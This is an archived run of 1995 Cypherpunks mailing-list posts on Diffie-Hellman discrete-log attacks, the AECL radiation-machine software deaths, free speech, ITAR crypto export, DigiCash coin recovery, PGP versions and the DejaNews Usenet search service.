problem is "brittle": for a given prime modulus p you have to spend a
lot of effort to calculate the first discrete log modulo p, but
subsequent discrete logs modulo p are easy to find.  Basically, you (a)
do a lot of precomputation to compute discrete logs for a set of
small(-ish) primes, and then (b) you combine these to find the
particular discrete log you're interested in.  For the second (and
subsequent) discrete logs modulo p you only have to do part (b), which
is pretty easy.

Our practical experiences with discrete logs suggests that the effort
required to perform the discrete log precomputations in (a) is slightly
more difficult than factoring a composite of the same size in bits.  In
1990-91 we estimated that performing (a) for a k-bit prime modulus was
about as hard as factoring a k+32-bit composite.  [Recent factoring work
has probably changed this a bit, but it's still a good estimate.]

Finally, remember that if the modulus in your appliation is public and
fixed (as it usually is) then you've got a very tempting target for me
to attack.  Once I do the precomputations I can break/subvert/read any
particular D-H exchange I want for little additional effort.  You have
to consider the amount of effort someone might bring to bear against
your entire system, not only against a particular transaction.  Breaking
a particular 512-bit RSA key might not be worth the effort if it just
gets me your encrypted e-mail (or whatever), but a 512-bit D-H modulus
in a widely deployed system is ripe for attack.

See our paper (available from http://www-swiss.ai.mit.edu/~bal/) for all
the juicy details.

					--bal





From anonymous-remailer at shell.portal.com  Tue Nov  7 01:47:51 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 7 Nov 95 01:47:51 PST
Subject: [noise, personal reply] CBC address.
Message-ID: <199511070946.BAA06926@jobe.shell.portal.com>


A post from Alice, that might be worth reading twice ...


On Sun, 5 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> 
> On Sat, 4 Nov 1995 anonymous-remailer at shell.portal.com wrote:
> 
> > Does anyone on this list know if the CBC has a web site on the Net?
> <www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
> realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
> newsgroup too.

Uhhm, thanks ... I guess ... but I wasn't _really_ looking for the 
CBC web site.

I was actually looking for someone to HOST a website which might 
showcase one particular program from the CBC, a program broadcast
in Canada which highlighted how AECL (Atomic Energy of Canada, Limited)
fails to practice safe computing and then when confronted, implements
a calculated program of strategic misrepresentation.  (i.e.  they lie.)

I thought that someone who strongly felt that error-free protocols and
error-free methods were important -- especially in mission critical
applications like medicine, commerce, or nuclear power plants -- might
possibly contact the CBC, and either voluntarily donate some bandwidth
and a host site, or conversely build a site devoted to showcasing the
human tragedy that can follow in the wake of shoddily designed
software.

I mean, good grief, we have Atomic Energy of Canada taking a cavalier
attitude towards computer code.  Not only is AECL involved in nuclear
medicine, in building wonderful radiological tools to help cancer
patients (theoretically) live, but they BUILD nuclear reactors worldwide.  

The CBC broadcast documented how this international firm REACTS to
reports of computer software errors.  It documents how the firm reacts
to reports of people dying because of sloppily written computer code.

The program is NOT (unfortunately) on the www.cbc.ca website, but
should be placed on the net and made available.  I'm not sure how, 
that was misunderstood.

But your next statement helped make it clear.

> You oughta use Sameer's (or someone else's) replyable remailer when asking 
> questions Alice.

I wasn't really asking for an answer, my Ottawa friend.  I really wasn't
looking for _another_ email in my mailbox to answer and address in my
copious spare time.  I was looking for some assistance. 

No direct reply was necessary.  

Someone could simply announce that they were volunteering to quarterback
bringing a host website online, and dealing with all the issues that are
involved with that (including liasing with the CBC.)

I'm not *quite* sure how you misread what I was hoping to achieve.

If however, you were looking to convince me to post to from a remailer
that allows replies ... one that might let you send me known plain text
back through it ... something traceable back to me ... then I *might*
really understand, and I might beg off for a bit. 

Bit premature, and such ...

I think I'll pass on _that_ offer, especially since I really wasn't
looking for a personal private reply to what I wrote. 

Maybe, if I requote myself, it will be a little clearer all around.

(That's, strike two, btw ... to my Ottawa friend.)


Here's what I wrote:

> I know that it is rude to follow up one of your own posts, and I
> apologize in advance for this horrible faux-pas, but hopefully, it's
> excused this one time.  I wrote:
>
>
> >One example of this that should serve as a useful case study is a recent 
> >problem which was brought to the Canadian public's attention just this 
> >week, on a program called the Fifth Estate.  The CBC (Canadian 
> >Broadcasting Corporation) detailed a software code problem in one of 
> >AECL's (Atomic Energy of Canada Limited's) instruments which deliver 
> >penetrating radiation.  
> >
> >The software which controlled the radiation dose, would periodically 
> >override the oncologist's calibration and deliver a radiation dose 100 
> >times what was prescribed.  This software "bug" literally killed wherever 
> >the machine was in use.
>
> Does anyone on this list know if the CBC has a web site on the Net?
>
> I'm hoping that someone (hint, hint) who has a convenient website, one
> with lots of spare bandwidth could volunteer to contact the CBC and
> persuade them to copyright clear the Fifth Estate program clip which
> documented some of the risks of software bugs in mission critical
> applications, and allow it to be placed on the Net.  I'm hoping that this
> English language piece reaches a wide international audience. 
> 
> The Canadian Broadcasting Corporation is a Crown Corporation which has
> historically received its primary funding from the Government of Canada. 
> Recently, it has suffered under the budgetary ax, and the push for
> privatization.  I'm pretty confident that the Corporation would copyright
> clear the clip for MPEG distribution across the Net, if they were
> approached with the concept that the clip was a demonstration of the CBC's
> journalistic excellence and integrity, a piece which is demonstrative of
> the critical need to continue their funding.  A concrete demonstration of
> the need for the CBC.  And a piece which could well receive deserved
> international acclaim. 
>
> The site would help them, and would simultaneously be a site of
> international public service. 
>
> Nothing will drive home the need for quality software, quality code, and
> quality security more than the vivid graphic pictures of the consequences
> of sloppy code, or of the risks if certain critical systems, LANs, or
> private networks are compromised, or if security and privacy (which are
> flip sides of the same coin) are ignored. 
>
> The sight of a body, that has had a hole burned straight through it from
> the front through to the spine is truly chilling and drives the message
> home.  Nothing seems to speak as clearly as a picture ... as to what the
> stakes are ... of what "bugs" in code do ... and of what a network
> compromise can leave in its wake. 
> 
> A picture of consequences.
> 
> Six people died in Canada and the United States due to the software flaw. 
> Even after numerous reports of the flaws, the company refused to even
> acknowledge the existence of a problem, and in fact did everything within
> its power to make sure doctors, radiologists and physicists were unaware. 
>
> The attitude of trivialization can only be characterized as fantastic, and
> would be unbelievable to anyone who has not viewed the piece. 
>
> It's one hell of a backgrounder which not only details problems, but looks
> at solutions -- it examines attitudes, especially management attitudes.  It
> truly deserves an expanded audience.  From teachers, to students, to the
> international media, to the concerned private individual, all will be
> served well if this piece gets wide attention. 
>
> Takers, anyone??

Now, how on earth, (after rereading what I wrote) did my words get
misunderstood??  And how on earth did someone figure that they needed to
establish a bi-directional communications channel with me?? 

I mean it's not like I'm atacking AT&T or Netscape, I'm simply trying to
coordinate a basic public service, and blow the whistle on bad code.

Blow the whistle on software which people expect (rightfully) to be
reliable ...  software which people expect (rightfully) not to cause any
human harm. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From thad at hammerhead.com  Mon Nov  6 09:56:41 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Tue, 7 Nov 1995 01:56:41 +0800
Subject: lp ?
Message-ID: <199511061539.HAA04245@hammerhead.com>


Michael Shields quoted and wrote:
> Anonymous <nobody at REPLAY.COM> wrote:
> > > -- then through the same
> > >  Vienna, Virginia (USA) site ...
> 
> ...a major router at a major interconnect run by UUNET, a major provider.
> datasrv appaently contracted with UUNET for traffic.  Naturally it would
> go through their network, which is centered in the US.

So, if this person was sending cryptographics codes from Switzerland
to Israel, the code would have been imported to the US, then exported
by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
but it might be something to threaten UUNET with if one of their Northern
Virginia neighbors ever wanted something the couldn't get otherwise.

thad
-- Thaddeus Beier                   email:  thad at hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244





From tcmay at got.net  Mon Nov  6 09:59:08 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 01:59:08 +0800
Subject: So much for free speech...
Message-ID: <acc37a5b03021004553e@[205.199.118.202]>


At 1:34 PM 11/6/95, s1113645 at tesla.cc.uottawa.ca wrote:
>On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
>
>> In the United States, we have the right to express whatever view we
>> wish, so long as it doesn't endanger others (e.g., insight to riot,
>> scream "fire" in a crowded theater when there is no fire, etc.).
>> Everyone has an inherent right to question why a person seeks moments of
>> anonymity or privacy.
>
>You're forgetting our good friends the libel laws. Another reason to go anon.
>You have the right to say whatever you please, but you'll have to be able
>to defend it in court if it damages someone's reputation. It can also get
>you fired. (or shot if you're MLK)


Sadly, the tradition of "free speech" is under assault. On many fronts. The
new "civil rights" laws are just one avenue for the suppression of what was
once considered free speech.

Submitted for your disapproval:

"13-year-old student arrested for racial slurs" (Santa Cruz Sentinel, p. 1,
3 November 1995)

by Michael Green, Redding Record Searchlight

"REDDING -- When a 13-year-old Redding student was arrested for allegedly
making racial slurs, police and school administrators said it was necessary
to maintain order and send a strong message against racism.

"But some legal experts take a dimmer view of the boy's arrest, saying that
calling someone names, even offensive ones, is not a crime and in fact is
constitutionally protected.

...


"The Redding-area boy, who is white, allegedly made racial insults toward a
12-year-old Hispanic student before being arrested last Thursday.

...

"Police Chief Bob Blankeship said he would encourage officers to use the
civil rights laws to stop racial harassment if prosecutors determine it is
appropriate.

...

"The boy was arrested on suspicion of violating the Hispanic student's
civil rights. Penal Code section 422.6 makes it a misdemeanor to interfere
with another person's rights or harm their property because of their race,
gender, religion, disability or sexual orientation."

-----

Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
to think bad thoughts," as Big Bro once said.

If they don't get you for illegally using random numbers, they'll get you
for uttering incorrect words.

Back to reality. No word on whether prosecution will take place (I doubt
it...this will likely be dropped, now that the message has been sent to the
students, and now that civil rights folks are getting interested).

Children are usually not accorded full constitutional protections,
especially not in public schools, but this does not mean the police should
arrest those who utter the wrong words! (Maybe suspending the student,
though I certainly wouldn't do that.)

This is the "safe and secure" world we are in, where bad thoughts and bad
words are punished. Or threatened with lawsuits. Anarchy seems infinitely
preferable to me.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hallam at w3.org  Mon Nov  6 10:02:18 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 02:02:18 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <9511061741.AA23439@zorch.w3.org>



>Suppose I have serious and plausibly realistic aspirations to become an 
>authority in some subtopic of cryptography, network security, etc. (sometime 
>well into the next millenium). Am I more likely to learn and hone my skills
>by actively participating (sticking my neck out) or merely lurking
>indefinitely ?  Regardless of the answer to the previous question, should
>the list suffer me my missteps and naivete ?

This dependsd on what you are attempting to do. If you are attempting to
not be thought a fool by anyone then keep quiet. If you want to learn
something then you have to speak up.

If you have an idea then the only way to know if it is any good is to 
test it. In the sciences we perform experiments. In engineering and 
social sciences this is not necessarily possible. We can still test an
idea by voicing it and looking at the response. This is the heart of 
Habbermass's theory of communicative action (modulo it is impossible
to communicate such a complex set of ideas in a single paragraph).

Just because the response to an idea is hostile does not make it invalid
however, the quality of the responses matters. If you get back a reasoned
argument you may judge it on the basis of the plausibility of its axioms
and the correctness of its logic - accepting that the argument may be
incomplete and not fully explain the point of view.

If on the other hand people write "This is wrong and I've told the
person why in secret" then the argument probably isn't valid. The funniest
version of this type of post being the "Here is an example of what is
wrong, I won't waste bandwidth here explaining the faults even though
I have already done so in making the post in the first place. So I have
not only wasted bandwidth but interrupted a lot of people with a vacuous post.


To address perrys point on social security privatisation, If there was such
a proposal and the basis on which it were to be run was that the privatised
company would gain all the data rights then I think there would be the
very type of political debate that characterises clipper.

One thing about the "new" key escrow system that people have not picked
up on. Would you trust Microsoft to be a key agent if you were Lotus or 
vice-versa? Why on earth should private key escrow be any better?


	Phill





From hallam at w3.org  Mon Nov  6 10:06:57 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 02:06:57 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511042303.PAA29063@blob.best.net>
Message-ID: <9511061746.AA11219@zorch.w3.org>



>This of course is the basic evil of government regulation:  Bricks are
>dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
>are dangerous.  Everything is dangerous, because everything could be used 
>to cause harm, deliberately or accidentally.

You miss the central point. The NSA are simply one link in a beuracratic
chain. Their behaviour is determined by their position in that chain and
the nature of the question they are asked. If we could change the 
question they were asked from "is this dangerous" to "is this significantly
more dangerous than allowing ownership of guns" we might get somewhere.

	Phill







From gnu at toad.com  Mon Nov  6 10:38:28 1995
From: gnu at toad.com (John Gilmore)
Date: Tue, 7 Nov 1995 02:38:28 +0800
Subject: New sendmail coming on toad.com; expect disruptions
Message-ID: <9511061822.AA28208@toad.com>


Hugh and I will be installing a new sendmail on toad over the next day
or two.  You can expect some delays and troubles from the list over
that period as we shake it down.  We hope that the result will be
faster and better service for y'all.

	John Gilmore






From raph at CS.Berkeley.EDU  Mon Nov  6 10:53:56 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Tue, 7 Nov 1995 02:53:56 +0800
Subject: So much for free speech...
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <199511061833.KAA27054@kiwi.cs.berkeley.edu>


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
[...]
> Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
> to think bad thoughts," as Big Bro once said.
[...]

Indeed. The conviction on my criminal record for verbal abuse is one
of the things that opened my eyes to the true state of "free speech"
in this country.

Raph

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBMJ5U42RuKj5D5x2JAQH0BgF9FxkKs0cRM/Ri0yvUKTnu5Q/2QAaEFVcD
rU6aruVdEN+j3iXOF0ot3mNRqoKc3nYN
=03DF
-----END PGP SIGNATURE-----





From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Mon Nov  6 10:55:18 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 02:55:18 +0800
Subject: lp ?
Message-ID: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


"Perry E. Metzger" writes:

: 
: Thaddeus J. Beier writes:
: > So, if this person was sending cryptographics codes from Switzerland
: > to Israel, the code would have been imported to the US, then exported
: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
: > but it might be something to threaten UUNET with if one of their Northern
: > Virginia neighbors ever wanted something the couldn't get otherwise.
: 
: It isn't clear that telecoms treaties don't implicitly make this legal
: in spite of the export regulations.

Once again, what the ITAR forbid is the disclosure of cryptographic
software to a foreign person within or without the United States, so
it does not make any difference whether the message containing the
code passes through the United States or not.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu






From dl at hplyot.obspm.fr  Mon Nov  6 11:09:20 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Tue, 7 Nov 1995 03:09:20 +0800
Subject: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061846.AA21160@hplyot.obspm.fr>


"Freedom shall stops where starts the one of the others"
That's what I learned, and what I think it is a "good thing",
Thus, your freedom of speach shall stops where it starts hurting
people

[not that I support at all the childish way l^Hamericans sue everybody
for anything, but I am happy that racists saying are not allowed and
can be condamned in France.]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

class struggle domestic disruption Kennedy bomb Saddam Hussein Peking
 Kaser Sose





From szabo at netcom.com  Mon Nov  6 11:52:48 1995
From: szabo at netcom.com (Nick Szabo)
Date: Tue, 7 Nov 1995 03:52:48 +0800
Subject: Recovering lost coins in ecash
Message-ID: <199511061916.LAA19291@netcom7.netcom.com>



> One problem a number of people have reported in DigiCash is disappearing
> money. Several people have reported that if a transfer is misconfigured
> the cash can flow out of the wallet, be rejected at the other end and
> disappear from the system - i.e. misprinted names on cheques mean lost cash!
 
These users need to learn the features of the software.  Backups of spent 
coins are retained in the payment history ledger.  Select the payment from
the ledger, and hit _Cancel_ to cancel the payment.   This credits the
lost coins to your account.

The story behind this (which is, alas, not so apparent to the user) is that
this essentially spends the coins at the bank, so that if they were lost, 
the amount will be credited to your account.  If the coins were already 
cleared and credited to the payee then you ask the payee for your money 
back (or to properly deliver the purchased service), relying on their 
business reputation (ie, complain loud and publically if you don't get 
satisfaction).  For the latter case an escrow service would be a useful
third-party add-on to the basic ecash system, to allow exchanges in
larger amounts without incurring this risk from the payee.

This bit of electronic magic is one place where ecash is superior 
to physical cash -- but at the expense of not being obvious 
from the metaphor.  It also illustrates the superior flexibility of
online clearing -- double spending is used as an error recovery tool,
to find out whether the payment was in fact lost, rather than as an 
indication of fraud.

Nick Szabo                              szabo at netcom.com  
Internet commerce consultant





From m5 at dev.tivoli.com  Mon Nov  6 12:04:38 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Tue, 7 Nov 1995 04:04:38 +0800
Subject: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061923.AA16190@alpha>



Laurent Demailly writes:
 > Thus, your freedom of speach shall stops where it starts hurting
 > people

It hurts me --- really --- to read that.  You should be condemned.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From perry at piermont.com  Mon Nov  6 12:10:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 04:10:03 +0800
Subject: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511061924.OAA14371@jekyll.piermont.com>



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> : It isn't clear that telecoms treaties don't implicitly make this legal
> : in spite of the export regulations.
> 
> Once again, what the ITAR forbid is the disclosure of cryptographic
> software to a foreign person within or without the United States, so
> it does not make any difference whether the message containing the
> code passes through the United States or not.

I understand that you are a lawyer and I'm not, but it is my
understanding that international treaties come in to play on this sort
of thing. For instance, in international shipments, you can transship
items and substances that are illegal to possess in a country through
its ports provided that the materials do not originate or terminate
their shipment in the country and remain sealed in their containers
throughout. It is also my understanding that items like mail and phone
calls that happen to transit a country are not necessarily subject to
that nations laws provided that the nation is not a terminal point for
the mail or call or what have you.

Treaties on this subject would quite clearly superseed any federal
laws under the supremacy clause of the constitution.

I am not absolutely sure of this, but I'm fairly sure that there are
already rules on all of this.

Perry






From frantz at netcom.com  Mon Nov  6 12:23:22 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 7 Nov 1995 04:23:22 +0800
Subject: Credentials Without Identity
Message-ID: <199511061951.LAA14798@netcom5.netcom.com>


At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>This applies very much so in Sweden too. It *is* illegal to maintain any
>database with 'information on persons' (like their email addresses) without
>approval from the Data Inspection. But it's an open secret that this law
>is broken on a massive front and no bureaucrat is really trying to uphold it.

So the address book I keep in my hip pocket is illegal!


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From aleph1 at dfw.net  Mon Nov  6 12:28:01 1995
From: aleph1 at dfw.net (Aleph One)
Date: Tue, 7 Nov 1995 04:28:01 +0800
Subject: [NOISE] Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <Pine.SUN.3.90.951106134640.212A-100000@dfw.net>


Ahh I told my self I would not reply to this but this next statement 
proved to me the "Dr. FC" has never read the Java Language Specification.

> >       Object field accesses are known to be legal--private or public
> > 	or protected
> 
> What exactly does this mean?

Obiously he has no idea what an object field is and what modifiers such 
as private or public do.

Also as in you flamage of Netscape you wont find answers here. If you 
really wanted answers you would post to the java mailinglist at Sun
where their engeniers would answer you questions. But its seems you dont 
really want answers. In anycase I'am crossposting this to the java 
mailing list.

a1

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From rsalz at osf.org  Tue Nov  7 04:40:41 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 95 04:40:41 PST
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511071238.AA00909@sulphur.osf.org>


>Sorry.  But still, then intent was to be user-friendly (right?), and
>a side effect was to make it possible to renumber without anyone noticing.

No.  DNS was created because the management of everyone editing and
downloading one huge file was just falling apart.  The Arpanet always
used names instead of numbers.  Moving hosts around was always possible.

CIDR doesn't affect that fact that if nntp.com switches, say, to BBN Planet
then I will have to get a new address.  CIDR just says you can route based
on smaller/larger granularity than IP Network Address classes.

>That's the connection between DNS and routing, and it's why using names
>instead of numbers is Good.

There is no connection.  Using names instead of numbers is good.  It
does bring up an interesting philosophical question about where the
True Name really is.  And how DNS must be part of your TCB unless/until
you have end-to-end mutual authentication.
	/r$





From warlord at MIT.EDU  Mon Nov  6 12:49:50 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Tue, 7 Nov 1995 04:49:50 +0800
Subject: Wich pgp is stronger?
In-Reply-To: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
Message-ID: <199511062004.PAA10278@toxicwaste.media.mit.edu>


> Wich pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?
> 
> What are exactly the differences between them?

I'm not sure what you mean by "stronger"?  I must admit that I have
not taken a close look at 2.6.2i, but my understanding is that it is
an internationalized version of code similar to 2.6.2.  The keygen
routines, RNG, and IDEA code are the same; the RSA code is different,
but supports the same range of keysizes.  The difference in RSA code
has to do with US patent law, where PGP 2.6.2 uses RSAREF, so it is
licensed to do RSA.

Other than that, I doubt there is any real difference.  The major
crypto and security functions are the same (or should be -- as I said,
I've not taken a close look at 2.6.2i).

-derek





From jolson at squeaky.free.org  Tue Nov  7 04:57:54 1995
From: jolson at squeaky.free.org (jolson)
Date: Tue, 7 Nov 95 04:57:54 PST
Subject: Software development
Message-ID: <199511071301.HAA11964@squeaky.free.org>


Two suggestions for new product development
1.  Secure virtual disk drives for OS/2

2.  A combination of secure email server/client for public domain use such 
    as this E-Mail list.






From hallam at w3.org  Mon Nov  6 13:13:09 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 05:13:09 +0800
Subject: Credentials Without Identity
In-Reply-To: <199511061951.LAA14798@netcom5.netcom.com>
Message-ID: <9511062041.AA15494@zorch.w3.org>



>At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>>This applies very much so in Sweden too. It *is* illegal to maintain any
>>database with 'information on persons' (like their email addresses) without
>>approval from the Data Inspection. But it's an open secret that this law
>>is broken on a massive front and no bureaucrat is really trying to uphold it.

>So the address book I keep in my hip pocket is illegal!

Not in the UK, any database maintained on a computer system is
covered under the act. Manual records are not. This distinction
is made because a group of senior conservative party members
and supporters finance a group who keep records of "political
disidents". These are available - for a fee for ue in checking
employees before giving them jobs.

Personally I think that this type of behaviour is unacceptable
in a democracy and that it demonstrates the arrogance of power.
I also think it falls plum center in the concerns of this group.
Should such groups be allowed to buy details of our spending 
habits from supermarkets? 


The UK law essentially means that data gathered for one pupose
may not be used for another. purpose without permission. It is
entirely OK to have an address book of email addresses for the
purpose of sending them mail.


	Phill





From tcmay at got.net  Mon Nov  6 13:17:01 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 05:17:01 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3adfa0702100476eb@[205.199.118.202]>



I usually avoid passing on URLs of interesting sites, in the name of
conserving bandwidth (*), but this one really has me jazzed:

http://dejanews.com/

It allows searching of Usenet archives (a few months' worth, from what I
can see).

This was pointed out to me on the Cyberia list, by Eugene Volokh, who wrote:

"    Check out http://dejanews.com/ -- truly a remarkable service.
They index a huge number of Internet news groups, and let you search
through them for any word or words you want.

"    Want to know what people are saying about some new book?  About
some political topic?  Most importantly, about you behind your back?
Check it out!  Lots of fun, and a bit scary."

A good way for newcomers to find out what's been written on some topic that
interests them, or to see who's writing what. (I checked out the index for:
"Blacknet," "Chaum," and a bunch of other things...the possibilities are
endless, and I suspect this will be the URL I go to more often than any
other.)

--Tim May

(* Perhaps someday we might ask people what their favorite URLs are. We've
done polls on books, so why not URLs?)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From stewarts at ix.netcom.com  Mon Nov  6 13:41:42 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 7 Nov 1995 05:41:42 +0800
Subject: using PGP only for digital signatures
Message-ID: <199511062107.NAA29648@ix5.ix.netcom.com>


At 04:12 PM 11/4/95 -0500, James Black <black at eng.usf.edu> wrote:
>Hello,
>  I am in a discussion (during the week) with a system administrator 
>about seeing if we can just make PGP publically available to everyone, 
>but now the discussion seems to be to just allow PGP to do digital 
>signatures, and I don't think that is the best choice, then.  They are 
>not against PGP being used, but there are legal issues as to whether they 
>can offer it to everyone, as some students are international students, 
>and are not allowed to use the version for the US, or so I have been 
>informed, so now I need to see if we can have the international version, 
>so these students can use it. :(
>  Is there any good programs (for the Unix, SunOS) that just does digital 
>signature encryption?  What they are trying to do is make certain that no 
>one can send a message to anyone, claim to be in the faculty, and cause 
>problems that way.  My position is just a student programmer, but I am 
>trying to learn as much as I can, to answer questions and deal with problems.

Yeah, there's RIPEM-SIG, which is approved for export so you can even give it
to your non-Yankee students, and it's compatible with the RIPEM secure email
stuff.
So your US students, and anyone else who wants to download the software from
England, can send secure email, and everybody can check the signatures.
I'm not sure if RIPEM-SIG has caught up with the features in the latest
versions of RIPEM, which include an X.509 variant on Web of Trust.

Somebody else has brought up the insecurity of using security software
on multi-user machines, where the system administrator or anybody who cracks
root can steal your passphrases and even replace the trustable software with
trojan-horse versions; your students will be safer if they only trust stuff
running on PCs from software they've verified themselves.  But you can at least
do signature-checking safely on a multi-user machine if the software is
protected adequately.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From gimonca at mirage.skypoint.com  Mon Nov  6 14:17:32 1995
From: gimonca at mirage.skypoint.com (Charles Gimon)
Date: Tue, 7 Nov 1995 06:17:32 +0800
Subject: DejaNews all over again--a URL for Usenet Searching (fwd)
Message-ID: <m0tCZ3A-0005LoC@skypoint.com>


Forwarded message:
> 
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).
> 

> 
> "    Want to know what people are saying about some new book?  About
> some political topic?  Most importantly, about you behind your back?
> Check it out!  Lots of fun, and a bit scary."
> 

Or to paraphrase Huey Long, "Every Man a Kibo".






From cme at acm.org  Mon Nov  6 15:27:35 1995
From: cme at acm.org (cme at acm.org)
Date: Tue, 7 Nov 1995 07:27:35 +0800
Subject: GAK criteria
Message-ID: <9511062204.AA02788@tis.com>



 http://csrc.ncsl.nist.gov/keyescrow/





From shields at tembel.org  Mon Nov  6 16:28:10 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 08:28:10 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <47m326$349@yage.tembel.org>


In article <acc3adfa0702100476eb@[205.199.118.202]>,
Timothy C. May <tcmay at got.net> wrote:
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> 
> http://dejanews.com/

Equally interesting is the author profile feature.  They don't provide
a perfectly convenient way to access it, so use this form.

<head>
<title>DejaNews author profile quickskip</title>
</head>
<body>

<form action="http://marge.dejanews.com/cgi-bin/dnauthor-profile.tcl">
<p><input type=text size=64 name=author value="shields at tembel.org"></p>
<p><input type=submit></p>
</form>

<p>DejaNews is here</p>

</body>
-- 
Shields.





From whitaker at sover.net  Mon Nov  6 19:02:27 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Tue, 7 Nov 1995 11:02:27 +0800
Subject: toolkits?
Message-ID: <199511070141.UAA15583@maple.sover.net>


OK folks, nobody seems to have any ideas how to keep our little state of
Vermont from falling prey to mediocrity in the internet. I thought with so
many highly opinionated people I would at least get a few good or at least
entertaining suggestions.

How about a different angle. Can anyone aid in building capacity among a few
sincere watchdog types to really learn how to map, trace and test the net
here as it grows?
What constitutes a basic toolkit for trace route, sniff for promiscuous
mode, all the other tools to map whats happening to net traffic in a little
state of 1/2 million people? What are the sources of traffic information?
With there not even a single DS-3 in the state yet carrying IP it seems we
just might have a prayer of doing it right, whatever that is. What would it
look like if secure communications and anonomynity were designed in from the
start? Is this what Sameer is doing in Bezerkeley?

